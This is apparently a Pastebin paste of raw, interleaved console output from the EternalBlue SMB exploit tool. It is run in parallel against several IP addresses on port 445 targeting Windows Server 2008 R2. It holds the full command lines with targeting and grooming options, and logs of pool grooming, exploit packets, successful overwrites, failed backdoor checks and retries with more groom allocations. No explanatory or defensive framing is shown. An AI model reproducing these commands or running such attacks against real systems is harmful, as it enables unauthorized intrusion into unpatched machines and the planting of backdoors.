Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --Ver
- ifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt
- .) ..
- .......[*] Connecting to target for exploitation.
- [+] Connection established for exploitation.
- .C:\Windows\Setup\fou1>.[*] Pinging backdoor...
- . [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- ([*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- .0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- call.[*] Building exploit buffer
- . start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.112 --Target WIN72K8R2 --D
- aveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --Verify
- Backdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt [*]
- Sending all but last fragment of exploit packet
- ..) ...
- ...............DONE.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- DONE.
- [*] Starting non-paged pool grooming
- [+] Sending SMBv2 buffers
- .......[*] Sending SMB Echo request
- .
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- .....C:\Windows\Setup\fou1> [+] Sending SMBv2 buffers
- (DONE.
- . [+] Sending large SMBv1 buffer..call.. start /b Eternalblue-2.2.0.exe --Tar
- getIp 127.83.19.90 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --Ta
- rgetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --
- GroomAllocations 12 --OutConfig 1.txt .DONE.
- . [+] Sending final SMBv2 buffers.) ....
- .
- C:\Windows\Setup\fou1>(call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.
- 94 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --V
- erifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations
- 12 --OutConfig 1.txt ) [*] Connecting to target for exploitation.
- [+] Connection established for exploitation.
- [*] Pinging backdoor...
- [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- [*] Building exploit buffer
- [*] Sending all but last fragment of exploit packet
- ..
- ...........[-] Error sending transaction packet
- [+] CORE terminated with status code 0xdf5d000c
- C:\Windows\Setup\fou1>[*] Connecting to target for exploitation.
- [+] Connection established for exploitation.
- (call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.110 --Target WIN72K8R2
- --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --Ve
- rifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt
- )
- [*] Pinging backdoor...
- [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- [*] Building exploit buffer
- [*] Sending all but last fragment of exploit packet
- ................DONE.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- [+] Sending SMBv2 buffers
- ...
- C:\Windows\Setup\fou1>(call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.
- 116 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --
- VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocation
- s 12 --OutConfig 1.txt )
- C:\Windows\Setup\fou1>(call start /b Eternalblue-2.2.0.exe --TargetIp 127.83.19.
- 120 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --
- VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocation
- s 12 --OutConfig 1.txt )
- [*] Connecting to target for exploitation.
- [+] Connection established for exploitation.
- [*] Pinging backdoor...
- [*] Connecting to target for exploitation.
- DONE.
- [+] Backdoor not installed, game on.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] Sending SMB Echo request
- [*] CORE raw buffer dump (52 bytes):
- [+] Connection established for exploitation.
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- [*] Pinging backdoor...
- [+] CORE terminated with status code 0xdf5d000c
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- [+] Backdoor not installed, game on.
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- [*] Target OS selected valid for OS indicated by SMB reply
- 0x00000030 6b 20 31 00 k 1.
- [*] CORE raw buffer dump (52 bytes):
- [*] Connecting to target for exploitation.
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- [+] Connection established for exploitation.
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- [*] Building exploit buffer
- [*] Pinging backdoor...
- 0x00000030 6b 20 31 00 k 1.
- [*] Sending all but last fragment of exploit packet
- [*] Building exploit buffer
- .[*] Sending all but last fragment of exploit packet
- ...............................DONE.
- DONE.
- [*] Sending SMB Echo request
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- [*] Starting non-paged pool grooming
- [+] Sending SMBv2 buffers
- [+] Sending SMBv2 buffers
- ............. [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- [*] Building exploit buffer
- [*] Sending all but last fragment of exploit packet
- ..DONE.
- . [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- .[*] Sending SMB Echo request
- .[-] ERROR sending SMB Echo - 0xFFFFFFF9
- .[+] CORE terminated with status code 0xdf5d000c
- ..........DONE.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- [+] Sending SMBv2 buffers
- ......DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- [+] CORE terminated with status code 0xdf5d000c
- [*] Connecting to target for exploitation.
- [+] Connection established for exploitation.
- [*] Pinging backdoor...
- [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] Connecting to target for exploitation.
- [*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- [*] Building exploit buffer
- [*] Sending all but last fragment of exploit packet
- ................DONE.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- [+] Connection established for exploitation.
- [+] Sending SMBv2 buffers
- .[*] Pinging backdoor...
- .. [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- [*] Building exploit buffer
- [*] Sending all but last fragment of exploit packet
- ................DONE.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- [+] Sending SMBv2 buffers
- .............DONE.
- [+] Sending large SMBv1 buffer..DONE.
- [+] Sending final SMBv2 buffers......DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- [+] CORE terminated with status code 0xdf5d000c
- DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- [+] CORE terminated with status code 0xdf5d000c
- DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- [*] Sending SMB Echo request
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- [+] CORE terminated with status code 0xdf5d000c
- [+] CORE terminated with status code 0xdf5d000c
- DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- [+] CORE terminated with status code 0xdf5d000c
- DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [-] ERROR sending SMB Echo - 0xFFFFFFF9
- [+] CORE terminated with status code 0xdf5d000c
- DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Sending last fragment of exploit packet!
- DONE.
- [*] Receiving response from exploit packet
- [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
- [*] Sending egg to corrupted connection.
- [*] Triggering free of corrupted buffer.
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [-] Error getting output back from Core; aborting...
- [*] Pinging backdoor...
- [+] Backdoor NOT installed
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- [*] Trying again with 17 Groom Allocations
- [*] Connecting to target for exploitation.
- [+] Connection established for exploitation.
- [*] Pinging backdoor...
- [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- [*] Building exploit buffer
- [*] Sending all but last fragment of exploit packet
- ................DONE.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- [+] Sending SMBv2 buffers
- ............DONE.
- .DONE.
- [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Sending last fragment of exploit packet!
- DONE.
- [*] Receiving response from exploit packet
- [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
- [*] Sending egg to corrupted connection.
- [*] Triggering free of corrupted buffer.
- [*] Pinging backdoor...
- [+] Backdoor NOT installed
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- [*] Trying again with 22 Groom Allocations
- [*] Connecting to target for exploitation.
- [-] Error getting output back from Core; aborting...
- [+] Connection established for exploitation.
- [*] Pinging backdoor...
- [+] Backdoor not installed, game on.
- [*] Target OS selected valid for OS indicated by SMB reply
- [*] CORE raw buffer dump (52 bytes):
- 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
- 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
- 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
- 0x00000030 6b 20 31 00 k 1.
- [*] Building exploit buffer
- [*] Sending all but last fragment of exploit packet
- ................DONE.
- [*] Sending SMB Echo request
- [*] Good reply from SMB Echo request
- [*] Starting non-paged pool grooming
- [+] Sending SMBv2 buffers
- ....
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement